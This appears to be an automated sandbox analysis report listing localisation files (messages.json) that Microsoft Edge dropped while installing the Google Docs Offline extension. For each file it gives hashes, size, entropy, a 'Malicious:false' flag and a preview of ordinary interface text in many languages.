                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):930
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                      MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                      SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                      SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                      SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):913
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                      MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                      SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                      SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                      SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):806
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                      MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                      SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                      SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                      SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):883
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                      MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                      SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                      SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                      SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                      MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                      SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                      SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                      SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1613
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                      MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                      SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                      SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                      SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):851
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                      MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                      SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                      SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                      SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):848
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                      MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                      SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                      SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                      SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1425
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                      MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                      SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                      SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                      SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                      MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                      SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                      SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                      SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):959
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                      MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                      SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                      SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                      SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):968
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                      MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                      SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                      SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                      SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):838
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
